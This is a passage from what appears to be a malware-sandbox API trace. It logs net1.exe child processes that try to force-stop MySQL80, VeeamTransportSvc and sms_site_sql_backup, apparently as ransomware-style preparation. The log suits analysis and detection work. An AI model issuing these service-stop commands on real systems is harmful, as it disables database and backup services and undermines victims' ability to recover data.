0xe6c [0130.993] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f9ec | out: lpSystemTimeAsFileTime=0x16f9ec*(dwLowDateTime=0x21cf9e30, dwHighDateTime=0x1d6f0d1)) [0130.993] GetCurrentProcessId () returned 0x132c [0130.993] GetCurrentThreadId () returned 0xe6c [0130.993] GetTickCount () returned 0x1153f52 [0130.993] QueryPerformanceCounter (in: lpPerformanceCount=0x16f9e4 | out: lpPerformanceCount=0x16f9e4*=25009402205) returned 1 [0130.993] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0130.994] __set_app_type (_Type=0x1) [0130.994] __p__fmode () returned 0x770331f4 [0130.994] __p__commode () returned 0x770331fc [0130.994] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0130.994] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0130.994] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.994] GetConsoleOutputCP () returned 0x1b5 [0130.995] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0130.995] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.999] sprintf_s (in: _DstBuf=0x16f9a4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0130.999] setlocale (category=0, locale=".437") returned="English_United States.437" [0131.002] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0131.002] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0131.002] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL80 /y" [0131.002] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f770, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0131.002] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x62) returned 0x1c3ad0 [0131.002] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0131.003] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f974 | out: Buffer=0x16f974*=0x1c1ad8) returned 0x0 [0131.003] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f974 | out: Buffer=0x16f974*=0x1c1af0) returned 0x0 [0131.003] _fileno (_File=0x77032900) returned -2 [0131.003] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0131.003] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0131.003] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0131.003] _wcsicmp (_String1="config", _String2="stop") returned -16 [0131.003] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0131.003] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0131.003] _wcsicmp (_String1="file", _String2="stop") returned -13 [0131.003] _wcsicmp (_String1="files", _String2="stop") returned -13 [0131.003] _wcsicmp (_String1="group", _String2="stop") returned -12 [0131.003] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0131.003] _wcsicmp (_String1="help", _String2="stop") returned -11 [0131.003] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0131.003] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0131.003] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0131.003] _wcsicmp (_String1="session", _String2="stop") returned -15 [0131.003] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0131.003] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0131.004] _wcsicmp (_String1="share", _String2="stop") returned -12 [0131.004] _wcsicmp (_String1="start", _String2="stop") returned -14 [0131.004] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0131.004] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0131.004] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0131.004] _wcsicmp (_String1="accounts", _String2="MySQL80") returned -12 [0131.004] _wcsicmp (_String1="computer", _String2="MySQL80") returned -10 [0131.004] _wcsicmp (_String1="config", _String2="MySQL80") returned -10 [0131.004] _wcsicmp (_String1="continue", _String2="MySQL80") returned -10 [0131.004] _wcsicmp (_String1="cont", _String2="MySQL80") returned -10 [0131.004] _wcsicmp (_String1="file", _String2="MySQL80") returned -7 [0131.004] _wcsicmp (_String1="files", _String2="MySQL80") returned -7 [0131.004] _wcsicmp (_String1="group", _String2="MySQL80") returned -6 [0131.004] _wcsicmp (_String1="groups", _String2="MySQL80") returned -6 [0131.004] _wcsicmp (_String1="help", _String2="MySQL80") returned -5 [0131.004] _wcsicmp (_String1="helpmsg", _String2="MySQL80") returned -5 [0131.004] _wcsicmp (_String1="localgroup", _String2="MySQL80") returned -1 [0131.004] _wcsicmp (_String1="pause", _String2="MySQL80") returned 3 [0131.004] _wcsicmp (_String1="session", _String2="MySQL80") returned 6 [0131.004] _wcsicmp (_String1="sessions", _String2="MySQL80") returned 6 [0131.004] _wcsicmp (_String1="sess", _String2="MySQL80") returned 6 [0131.004] _wcsicmp (_String1="share", _String2="MySQL80") returned 6 [0131.004] _wcsicmp (_String1="start", _String2="MySQL80") returned 6 [0131.004] _wcsicmp (_String1="stats", _String2="MySQL80") returned 6 [0131.004] _wcsicmp (_String1="statistics", _String2="MySQL80") returned 6 [0131.004] _wcsicmp (_String1="stop", _String2="MySQL80") returned 6 [0131.004] _wcsicmp (_String1="time", _String2="MySQL80") returned 7 [0131.005] _wcsicmp (_String1="user", _String2="MySQL80") returned 8 [0131.005] _wcsicmp (_String1="users", _String2="MySQL80") returned 8 [0131.005] _wcsicmp (_String1="msg", _String2="MySQL80") returned -6 [0131.005] _wcsicmp (_String1="messenger", _String2="MySQL80") returned -20 [0131.005] _wcsicmp (_String1="receiver", _String2="MySQL80") returned 5 [0131.005] _wcsicmp (_String1="rcv", _String2="MySQL80") returned 5 [0131.005] _wcsicmp (_String1="netpopup", _String2="MySQL80") returned 1 [0131.005] _wcsicmp (_String1="redirector", _String2="MySQL80") returned 5 [0131.005] _wcsicmp (_String1="redir", _String2="MySQL80") returned 5 [0131.005] _wcsicmp (_String1="rdr", _String2="MySQL80") returned 5 [0131.005] _wcsicmp (_String1="workstation", _String2="MySQL80") returned 10 [0131.005] _wcsicmp (_String1="work", _String2="MySQL80") returned 10 [0131.005] _wcsicmp (_String1="wksta", _String2="MySQL80") returned 10 [0131.005] _wcsicmp (_String1="prdr", _String2="MySQL80") returned 3 [0131.005] _wcsicmp (_String1="devrdr", _String2="MySQL80") returned -9 [0131.005] _wcsicmp (_String1="lanmanworkstation", _String2="MySQL80") returned -1 [0131.005] _wcsicmp (_String1="server", _String2="MySQL80") returned 6 [0131.005] _wcsicmp (_String1="svr", _String2="MySQL80") returned 6 [0131.005] _wcsicmp (_String1="srv", _String2="MySQL80") returned 6 [0131.005] _wcsicmp (_String1="lanmanserver", _String2="MySQL80") returned -1 [0131.005] _wcsicmp (_String1="alerter", _String2="MySQL80") returned -12 [0131.005] _wcsicmp (_String1="netlogon", _String2="MySQL80") returned 1 [0131.006] _wcsupr (in: _String="MySQL80" | out: _String="MYSQL80") returned="MYSQL80" [0131.006] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1c5498 [0131.616] GetServiceKeyNameW (in: hSCManager=0x1c5498, lpDisplayName="MYSQL80", lpServiceName=0xe5aaf0, lpcchBuffer=0x16f910 | out: lpServiceName="", lpcchBuffer=0x16f910) returned 0 [0131.618] _wcsicmp (_String1="msg", _String2="MYSQL80") returned -6 [0131.618] _wcsicmp (_String1="messenger", _String2="MYSQL80") returned -20 [0131.618] _wcsicmp (_String1="receiver", _String2="MYSQL80") returned 5 [0131.618] _wcsicmp (_String1="rcv", _String2="MYSQL80") returned 5 [0131.618] _wcsicmp (_String1="redirector", _String2="MYSQL80") returned 5 [0131.618] _wcsicmp (_String1="redir", _String2="MYSQL80") returned 5 [0131.618] _wcsicmp (_String1="rdr", _String2="MYSQL80") returned 5 [0131.618] _wcsicmp (_String1="workstation", _String2="MYSQL80") returned 10 [0131.618] _wcsicmp (_String1="work", _String2="MYSQL80") returned 10 [0131.618] _wcsicmp (_String1="wksta", _String2="MYSQL80") returned 10 [0131.618] _wcsicmp (_String1="prdr", _String2="MYSQL80") returned 3 [0131.618] _wcsicmp (_String1="devrdr", _String2="MYSQL80") returned -9 [0131.618] _wcsicmp (_String1="lanmanworkstation", _String2="MYSQL80") returned -1 [0131.618] _wcsicmp (_String1="server", _String2="MYSQL80") returned 6 [0131.618] _wcsicmp (_String1="svr", _String2="MYSQL80") returned 6 [0131.618] _wcsicmp (_String1="srv", _String2="MYSQL80") returned 6 [0131.618] _wcsicmp (_String1="lanmanserver", _String2="MYSQL80") returned -1 [0131.618] _wcsicmp (_String1="alerter", _String2="MYSQL80") returned -12 [0131.618] _wcsicmp (_String1="netlogon", _String2="MYSQL80") returned 1 [0131.618] NetServiceControl (in: servername=0x0, service="MYSQL80", opcode=0x0, arg=0x0, bufptr=0x16f90c | out: bufptr=0x16f90c) returned 0x889 [0131.620] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0131.620] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71240000 [0131.621] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71240000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0131.623] GetFileType (hFile=0x0) returned 0x0 [0131.623] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x1c3eb8 [0131.623] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x1c3eb8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0131.623] WriteFile (in: hFile=0x0, lpBuffer=0x1c3eb8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16f84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f84c, lpOverlapped=0x0) returned 0 [0131.623] LocalFree (hMem=0x1c3eb8) returned 0x0 [0131.623] GetFileType (hFile=0x0) returned 0x0 [0131.623] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1c6160 [0131.623] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x1c6160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x1c", lpUsedDefaultChar=0x0) returned 2 [0131.623] WriteFile (in: hFile=0x0, lpBuffer=0x1c6160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f84c, lpOverlapped=0x0) returned 0 [0131.624] LocalFree (hMem=0x1c6160) returned 0x0 [0131.624] _ultow (in: _Dest=0x889, _Radix=1505404 | out: _Dest=0x889) returned="2185" [0131.624] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71240000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0131.624] GetFileType (hFile=0x0) returned 0x0 [0131.624] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x1c6160 [0131.624] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x1c6160, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0131.624] WriteFile (in: hFile=0x0, lpBuffer=0x1c6160, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16f858, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f858, lpOverlapped=0x0) returned 0 [0131.624] LocalFree (hMem=0x1c6160) returned 0x0 [0131.624] GetFileType (hFile=0x0) returned 0x0 [0131.624] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1c6160 [0131.624] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x1c6160, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x1c", lpUsedDefaultChar=0x0) returned 2 [0131.624] WriteFile (in: hFile=0x0, lpBuffer=0x1c6160, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f858, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f858, lpOverlapped=0x0) returned 0 [0131.624] LocalFree (hMem=0x1c6160) returned 0x0 [0131.625] NetApiBufferFree (Buffer=0x1c1ad8) returned 0x0 [0131.625] NetApiBufferFree (Buffer=0x1c1af0) returned 0x0 [0131.625] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL80 /y" [0131.625] exit (_Code=2) Process: id = "324" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x51c49000" os_pid = "0xdcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "193" os_parent_pid = "0x12f0" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 735 os_tid = 0x410 [0130.613] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efe64 | out: lpSystemTimeAsFileTime=0x1efe64*(dwLowDateTime=0x21967d30, dwHighDateTime=0x1d6f0d1)) [0130.613] GetCurrentProcessId () returned 0xdcc [0130.613] GetCurrentThreadId () returned 0x410 [0130.613] GetTickCount () returned 0x1153ddb [0130.613] QueryPerformanceCounter (in: lpPerformanceCount=0x1efe5c | out: lpPerformanceCount=0x1efe5c*=24971367763) returned 1 [0130.613] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0130.613] __set_app_type (_Type=0x1) [0130.613] __p__fmode () returned 0x770331f4 [0130.613] __p__commode () returned 0x770331fc [0130.613] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0130.614] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0130.614] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.614] GetConsoleOutputCP () returned 0x1b5 [0130.614] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0130.614] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.011] sprintf_s (in: _DstBuf=0x1efe1c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0131.011] setlocale (category=0, locale=".437") returned="English_United States.437" [0131.014] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0131.014] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0131.014] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" [0131.014] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1efbe8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0131.014] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x76) returned 0x59f658 [0131.014] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0131.015] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efdec | out: Buffer=0x1efdec*=0x5a1af8) returned 0x0 [0131.015] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efdec | out: Buffer=0x1efdec*=0x5a1b10) returned 0x0 [0131.015] _fileno (_File=0x77032900) returned -2 [0131.015] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0131.015] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0131.015] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0131.015] _wcsicmp (_String1="config", _String2="stop") returned -16 [0131.015] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0131.015] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0131.015] _wcsicmp (_String1="file", _String2="stop") returned -13 [0131.015] _wcsicmp (_String1="files", _String2="stop") returned -13 [0131.015] _wcsicmp (_String1="group", _String2="stop") returned -12 [0131.015] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0131.015] _wcsicmp (_String1="help", _String2="stop") returned -11 [0131.015] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0131.015] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0131.015] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0131.015] _wcsicmp (_String1="session", _String2="stop") returned -15 [0131.015] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0131.015] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0131.015] _wcsicmp (_String1="share", _String2="stop") returned -12 [0131.015] _wcsicmp (_String1="start", _String2="stop") returned -14 [0131.016] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0131.016] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0131.016] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0131.016] _wcsicmp (_String1="accounts", _String2="VeeamTransportSvc") returned -21 [0131.016] _wcsicmp (_String1="computer", _String2="VeeamTransportSvc") returned -19 [0131.016] _wcsicmp (_String1="config", _String2="VeeamTransportSvc") returned -19 [0131.016] _wcsicmp (_String1="continue", _String2="VeeamTransportSvc") returned -19 [0131.016] _wcsicmp (_String1="cont", _String2="VeeamTransportSvc") returned -19 [0131.016] _wcsicmp (_String1="file", _String2="VeeamTransportSvc") returned -16 [0131.016] _wcsicmp (_String1="files", _String2="VeeamTransportSvc") returned -16 [0131.016] _wcsicmp (_String1="group", _String2="VeeamTransportSvc") returned -15 [0131.016] _wcsicmp (_String1="groups", _String2="VeeamTransportSvc") returned -15 [0131.016] _wcsicmp (_String1="help", _String2="VeeamTransportSvc") returned -14 [0131.016] _wcsicmp (_String1="helpmsg", _String2="VeeamTransportSvc") returned -14 [0131.016] _wcsicmp (_String1="localgroup", _String2="VeeamTransportSvc") returned -10 [0131.016] _wcsicmp (_String1="pause", _String2="VeeamTransportSvc") returned -6 [0131.016] _wcsicmp (_String1="session", _String2="VeeamTransportSvc") returned -3 [0131.016] _wcsicmp (_String1="sessions", _String2="VeeamTransportSvc") returned -3 [0131.016] _wcsicmp (_String1="sess", _String2="VeeamTransportSvc") returned -3 [0131.016] _wcsicmp (_String1="share", _String2="VeeamTransportSvc") returned -3 [0131.016] _wcsicmp (_String1="start", _String2="VeeamTransportSvc") returned -3 [0131.016] _wcsicmp (_String1="stats", _String2="VeeamTransportSvc") returned -3 [0131.016] _wcsicmp (_String1="statistics", _String2="VeeamTransportSvc") returned -3 [0131.016] _wcsicmp (_String1="stop", _String2="VeeamTransportSvc") returned -3 [0131.016] _wcsicmp (_String1="time", _String2="VeeamTransportSvc") returned -2 [0131.016] _wcsicmp (_String1="user", _String2="VeeamTransportSvc") returned -1 [0131.016] _wcsicmp (_String1="users", _String2="VeeamTransportSvc") returned -1 [0131.017] _wcsicmp (_String1="msg", _String2="VeeamTransportSvc") returned -9 [0131.017] _wcsicmp (_String1="messenger", _String2="VeeamTransportSvc") returned -9 [0131.017] _wcsicmp (_String1="receiver", _String2="VeeamTransportSvc") returned -4 [0131.017] _wcsicmp (_String1="rcv", _String2="VeeamTransportSvc") returned -4 [0131.017] _wcsicmp (_String1="netpopup", _String2="VeeamTransportSvc") returned -8 [0131.017] _wcsicmp (_String1="redirector", _String2="VeeamTransportSvc") returned -4 [0131.017] _wcsicmp (_String1="redir", _String2="VeeamTransportSvc") returned -4 [0131.017] _wcsicmp (_String1="rdr", _String2="VeeamTransportSvc") returned -4 [0131.017] _wcsicmp (_String1="workstation", _String2="VeeamTransportSvc") returned 1 [0131.017] _wcsicmp (_String1="work", _String2="VeeamTransportSvc") returned 1 [0131.017] _wcsicmp (_String1="wksta", _String2="VeeamTransportSvc") returned 1 [0131.017] _wcsicmp (_String1="prdr", _String2="VeeamTransportSvc") returned -6 [0131.017] _wcsicmp (_String1="devrdr", _String2="VeeamTransportSvc") returned -18 [0131.017] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamTransportSvc") returned -10 [0131.017] _wcsicmp (_String1="server", _String2="VeeamTransportSvc") returned -3 [0131.017] _wcsicmp (_String1="svr", _String2="VeeamTransportSvc") returned -3 [0131.017] _wcsicmp (_String1="srv", _String2="VeeamTransportSvc") returned -3 [0131.017] _wcsicmp (_String1="lanmanserver", _String2="VeeamTransportSvc") returned -10 [0131.017] _wcsicmp (_String1="alerter", _String2="VeeamTransportSvc") returned -21 [0131.017] _wcsicmp (_String1="netlogon", _String2="VeeamTransportSvc") returned -8 [0131.017] _wcsupr (in: _String="VeeamTransportSvc" | out: _String="VEEAMTRANSPORTSVC") returned="VEEAMTRANSPORTSVC" [0131.018] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5a5448 [0131.022] GetServiceKeyNameW (in: hSCManager=0x5a5448, lpDisplayName="VEEAMTRANSPORTSVC", lpServiceName=0xe5aaf0, lpcchBuffer=0x1efd88 | out: lpServiceName="", lpcchBuffer=0x1efd88) returned 0 [0131.023] _wcsicmp (_String1="msg", _String2="VEEAMTRANSPORTSVC") returned -9 [0131.023] _wcsicmp (_String1="messenger", _String2="VEEAMTRANSPORTSVC") returned -9 [0131.023] _wcsicmp (_String1="receiver", _String2="VEEAMTRANSPORTSVC") returned -4 [0131.023] _wcsicmp (_String1="rcv", _String2="VEEAMTRANSPORTSVC") returned -4 [0131.023] _wcsicmp (_String1="redirector", _String2="VEEAMTRANSPORTSVC") returned -4 [0131.023] _wcsicmp (_String1="redir", _String2="VEEAMTRANSPORTSVC") returned -4 [0131.023] _wcsicmp (_String1="rdr", _String2="VEEAMTRANSPORTSVC") returned -4 [0131.023] _wcsicmp (_String1="workstation", _String2="VEEAMTRANSPORTSVC") returned 1 [0131.023] _wcsicmp (_String1="work", _String2="VEEAMTRANSPORTSVC") returned 1 [0131.023] _wcsicmp (_String1="wksta", _String2="VEEAMTRANSPORTSVC") returned 1 [0131.023] _wcsicmp (_String1="prdr", _String2="VEEAMTRANSPORTSVC") returned -6 [0131.023] _wcsicmp (_String1="devrdr", _String2="VEEAMTRANSPORTSVC") returned -18 [0131.023] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMTRANSPORTSVC") returned -10 [0131.024] _wcsicmp (_String1="server", _String2="VEEAMTRANSPORTSVC") returned -3 [0131.024] _wcsicmp (_String1="svr", _String2="VEEAMTRANSPORTSVC") returned -3 [0131.024] _wcsicmp (_String1="srv", _String2="VEEAMTRANSPORTSVC") returned -3 [0131.024] _wcsicmp (_String1="lanmanserver", _String2="VEEAMTRANSPORTSVC") returned -10 [0131.024] _wcsicmp (_String1="alerter", _String2="VEEAMTRANSPORTSVC") returned -21 [0131.024] _wcsicmp (_String1="netlogon", _String2="VEEAMTRANSPORTSVC") returned -8 [0131.024] NetServiceControl (in: servername=0x0, service="VEEAMTRANSPORTSVC", opcode=0x0, arg=0x0, bufptr=0x1efd84 | out: bufptr=0x1efd84) returned 0x889 [0131.026] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0131.026] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0131.026] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0131.028] GetFileType (hFile=0x0) returned 0x0 [0131.028] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5a3e68 [0131.028] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5a3e68, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0131.028] WriteFile (in: hFile=0x0, lpBuffer=0x5a3e68, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1efcc4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efcc4, lpOverlapped=0x0) returned 0 [0131.028] LocalFree (hMem=0x5a3e68) returned 0x0 [0131.028] GetFileType (hFile=0x0) returned 0x0 [0131.028] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5a6110 [0131.028] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5a6110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nZ", lpUsedDefaultChar=0x0) returned 2 [0131.028] WriteFile (in: hFile=0x0, lpBuffer=0x5a6110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efcc4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efcc4, lpOverlapped=0x0) returned 0 [0131.028] LocalFree (hMem=0x5a6110) returned 0x0 [0131.028] _ultow (in: _Dest=0x889, _Radix=2030836 | out: _Dest=0x889) returned="2185" [0131.028] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0131.029] GetFileType (hFile=0x0) returned 0x0 [0131.029] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5a6110 [0131.029] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5a6110, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0131.029] WriteFile (in: hFile=0x0, lpBuffer=0x5a6110, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1efcd0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efcd0, lpOverlapped=0x0) returned 0 [0131.029] LocalFree (hMem=0x5a6110) returned 0x0 [0131.029] GetFileType (hFile=0x0) returned 0x0 [0131.029] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5a6110 [0131.029] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5a6110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nZ", lpUsedDefaultChar=0x0) returned 2 [0131.029] WriteFile (in: hFile=0x0, lpBuffer=0x5a6110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efcd0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efcd0, lpOverlapped=0x0) returned 0 [0131.029] LocalFree (hMem=0x5a6110) returned 0x0 [0131.030] NetApiBufferFree (Buffer=0x5a1af8) returned 0x0 [0131.030] NetApiBufferFree (Buffer=0x5a1b10) returned 0x0 [0131.030] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamTransportSvc /y" [0131.030] exit (_Code=2) Process: id = "325" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x51c2f000" os_pid = "0x1c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "195" os_parent_pid = "0x1300" cmd_line = "C:\\Windows\\system32\\net1 stop sms_site_sql_backup /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], 